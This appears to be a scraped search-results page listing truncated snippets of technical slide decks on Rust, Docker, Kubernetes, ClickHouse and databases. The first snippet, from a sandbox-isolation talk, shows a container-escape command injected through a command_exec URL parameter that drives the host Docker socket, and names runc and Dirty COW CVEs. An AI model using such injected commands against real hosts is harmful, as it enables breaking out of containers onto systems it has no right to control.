基于Rust-vmm实现Kubernetes运行时Sandbox Isolation. • Container Escape docker.vh.neargle.com:8888/?command_exec=python3 -c "import docker;client = docker.DockerClient(base_url='unix:///var/run/docker.sock');data = client.containers.run('alpine:latest' overflow vulnerability −CVE-2016-5195 Dirty COW vulnerability −CVE-2019-5736 Docker runc vulnerability −CVE-2019-14271 Docker CP vulnerability Pod Isolation Challenges • Noisy neighbor −Impact performance Monitor suspicious read/write to host files. For example, containerd-shim/busybox/docker-runc , /usr/bin/docker-runc /bin/bash /bad_init /proc/self/fd/ 4. Linux Kernel Patch Are those enough? NO0 码力 | 27 页 | 34.17 MB | 1 年前3
Bazel支持 gcc clang 更新内容 Curve1 编译 Debian11-Dockerfile .bazelrc bazel 版本: 4.2.2 ( bazelisk) docker run -v $(pwd):/curve -it opencurvedocker/curve-base:build-debian11 cd /curve/ # 使用 gcc 编译 bazel enable C++17 over-aligned new support # 使用 clang 编译 CC=clang CXX=clang++ bazel build …2 制作镜像 docker run -v $(pwd):/curve -v /root/.cache/bazel:/root/.cache/bazel -it opencurvedocker/curve-base:build-debian110 码力 | 6 页 | 4.69 MB | 6 月前3
Harbor Deep Dive - Open source trusted cloud native registryChart repository • Same mechanism and user experiences with image management Multi Deployments • Docker Compose • BOSH/Pivotal Tile • Helm Chart Label • Label in project and system scopes • Mark labels Schedulers/Runtimes Consumers LDAP/Active Directory Supporting services Harbor Packaging Docker Kubernetes Cloud Foundry Deep dive Harbor through panel discussion! Q1: What other features harbor0 码力 | 15 页 | 8.40 MB | 1 年前3
Автоматизация управления ClickHouse-кластерами в KubernetesClickHouse Operator ClickHouseInstallation YAML file Лицензия: Apache 2.0, Распространяется как Docker image ClickHouse cluster resources kubectl apply K8S API Спецификация ClickHouse on Kubernetes0 码力 | 44 页 | 2.24 MB | 1 年前3
唐刚 - Use Rust to Develop the Decentralized Open Data Application - RustChinaConf2023EightFish Application Network Topology How to Write Logic How to Write Logic How to Write Logic ➔ Docker compose, yaml configure file ➔ One command to boot up and deploy ➔ 5 fixed EightFish services + 10 码力 | 30 页 | 2.53 MB | 1 年前3
Analyzing MySQL Logs with ClickHouseSupport, Consulting and Training © 2018 Percona. 39 Bonus: Using PMM for ClickHouse Monitoring • docker run -d -p 9116:9116 f1yegor/clickhouse-exporter -scrape_uri=http://myhost:8123/ • pmm-admin config0 码力 | 43 页 | 2.70 MB | 1 年前3
夏歌-使用Rust构建LLM应用Langchain Rewrite it in Rust • 笨重 • 资源占用多 • 大部分时间是在等待 • 轻量级 • 资源占用量小 • 节省大量计算资源 Python 与 Docker Rust 与 WebAssembly 为什么要用 Rust ? Rewrite it in Rust Rust 太难学! 为什么不用 Rust ? 学习曲线太陡峭了,学习周期太长了0 码力 | 36 页 | 38.31 MB | 1 年前3
新一代分布式高性能图数据库的构建 - 沈游人索引管理 一致性存储 RAFT 分片管理 元数据 集群管理 用户权限 GNN 应用层 Atlas 图平台 Atlas Studio Atlas Client 基础 设施 Docker/K8S/VM X86/ARM - 基于 RUST 语言保证性能优势 - 分布式架构性能可线性扩展 - 针对大规模图优化的存算引擎 - 配合 Atlas 图平台,实现无代码图分析0 码力 | 38 页 | 24.68 MB | 1 年前3
共 8 条
- 1













